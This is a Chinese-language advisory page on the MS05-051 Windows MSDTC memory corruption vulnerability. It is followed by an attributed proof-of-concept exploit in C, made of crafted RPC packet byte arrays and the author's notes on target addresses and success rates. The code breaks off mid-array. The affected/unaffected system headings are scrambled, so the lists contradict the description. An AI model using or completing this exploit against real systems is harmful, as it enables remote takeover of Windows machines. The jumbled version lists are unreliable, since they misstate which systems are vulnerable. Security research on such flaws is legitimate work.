Microsoft Windows MSDTC内存破坏漏洞(MS05-051)
发布日期:2005-10-12
更新日期:2005-11-27
受影响系统:
Microsoft Windows XP SP2不受影响系统:
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
Microsoft Windows ME描述:
Microsoft Windows 98se
Microsoft Windows 98
BUGTRAQ ID: 15056
CVE(CAN) ID: CVE-2005-2119
Microsoft Windows是微软发布的非常流行的操作系统,Microsoft分布式事务处理协调器(MSDTC)是Microsoft Windows 平台的一个分布式事务处理设备。
Microsoft Windows MSDTC处理用户请求存在漏洞,允许远程攻击者在任意内存地址写入有限有限的数据字节,成功利用此漏洞可以在一些Windows系统上执行任意指令,从而完全控制系统。
在Windows 2000上,这是一个远程执行代码漏洞。在Windows XP Service Pack 1和Windows Server 2003上,这是一个本地特权提升漏洞。 在Windows XP Service Pack 1上,如果启动了Microsoft MSDTC,这还会变为一个远程执行代码漏洞。
<*来源:Eeye Digital Security
链接:http://www.microsoft.com/technet/security/bulletin/MS05-051.mspx
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
http://www.eeye.com/html/research/advisories/AD20051011b.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Hard to exploit, isn't it? I have tested it on 10 box, most of them allocated 0x9X0058 for
me, however, I cannot write the pointer to 0x7ffdf020 since the length I can control should be
divided exactly by 8 (***), so I choose 0x684191c4.
This following program is mostly like a D.O.S. 10 blackbox were tested, only 5 were owned,
and I think the successful rate should be much lower in real circumstance.
I mark it as a POC and wish someone (no hat) could supply us a much better exploit. It is
said that this fault could be steered clear of and another segfault is consequently triggered,
so...
Any mails are welcome but spam, I need NO viagra. Je suis celibataire.
Greetz:
All SST guys, I love your bald heads that never hatted.
Shuo Yang, I love you.
OYXin, ...
Code by:
Swan (Swan[at]0x557[dot]org)
*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
char peer0_0[72] = {
(char)0x05, (char)0x00, (char)0x0b, (char)0x03, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x48, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0xd0, (char)0x16, (char)0xd0, (char)0x16, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x01, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x04, (char)0x5d, (char)0x88, (char)0x8a,
(char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00,
(char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 };
char peer0_1[1024] = {
(char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
